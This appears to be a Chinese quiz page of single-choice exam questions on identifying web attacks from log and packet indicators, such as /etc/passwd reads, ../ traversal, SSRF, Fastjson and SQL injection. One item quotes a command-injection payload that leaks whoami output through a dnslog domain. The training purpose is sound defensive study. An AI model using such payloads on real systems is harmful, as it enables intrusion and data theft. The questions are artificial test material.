單項(xiàng)選擇題當(dāng)攻擊日志中出現(xiàn)/etc/passwd字樣時(shí),說明攻擊者有可能進(jìn)行哪項(xiàng)漏洞測(cè)試()

A.SSRF漏洞攻擊
B.代碼執(zhí)行漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.任意文件讀取


您可能感興趣的試卷

你可能感興趣的試題

1.單項(xiàng)選擇題當(dāng)日志中頻繁出現(xiàn)內(nèi)網(wǎng)IP地址,如127.0.0.1,192.168.1.1等,可能是攻擊者進(jìn)行什么漏洞嘗試()

A.SSRF漏洞攻擊
B.代碼執(zhí)行漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.任意文件讀取

2.單項(xiàng)選擇題請(qǐng)求url為/env,/actuator/env字樣,可以判斷出后端使用的是()

A.Weblogic
B.Tomcat
C.Apache
D.Springboot

3.單項(xiàng)選擇題攻擊數(shù)據(jù)包中出現(xiàn)多個(gè)"../"字樣,則最有可能是攻擊者進(jìn)行哪項(xiàng)漏洞攻擊()

A.xss漏洞攻擊
B.xml注入漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.任意文件讀取

5.單項(xiàng)選擇題網(wǎng)絡(luò)數(shù)據(jù)包中出現(xiàn)ping `whoami`.aaa.dnslog.com,攻擊者最有可能的目的是哪項(xiàng)()

A.xss漏洞攻擊
B.單純執(zhí)行ping命令
C.把whoami命令執(zhí)行結(jié)果,通過dns域名顯示出來
D.SQL注入漏洞攻擊

7.單項(xiàng)選擇題網(wǎng)絡(luò)數(shù)據(jù)包中出現(xiàn)wget、curl等字眼時(shí),說明攻擊者最有可能采取以下哪種漏洞攻擊()

A.xss漏洞攻擊
B.xml注入漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.SQL注入漏洞攻擊

8.單項(xiàng)選擇題在攻擊數(shù)據(jù)包中,出現(xiàn)select、database()、user()、version()等字眼,可能是以下哪種攻擊()

A.xss漏洞攻擊
B.ssrf漏洞攻擊
C.文件上傳漏洞攻擊
D.SQL注入漏洞攻擊

9.單項(xiàng)選擇題在攻擊數(shù)據(jù)包中,出現(xiàn)@type的字眼,可能是以下哪種攻擊()

A.ssrf漏洞攻擊
B.Log4j漏洞攻擊
C.csrf漏洞攻擊
D.Fastjson漏洞攻擊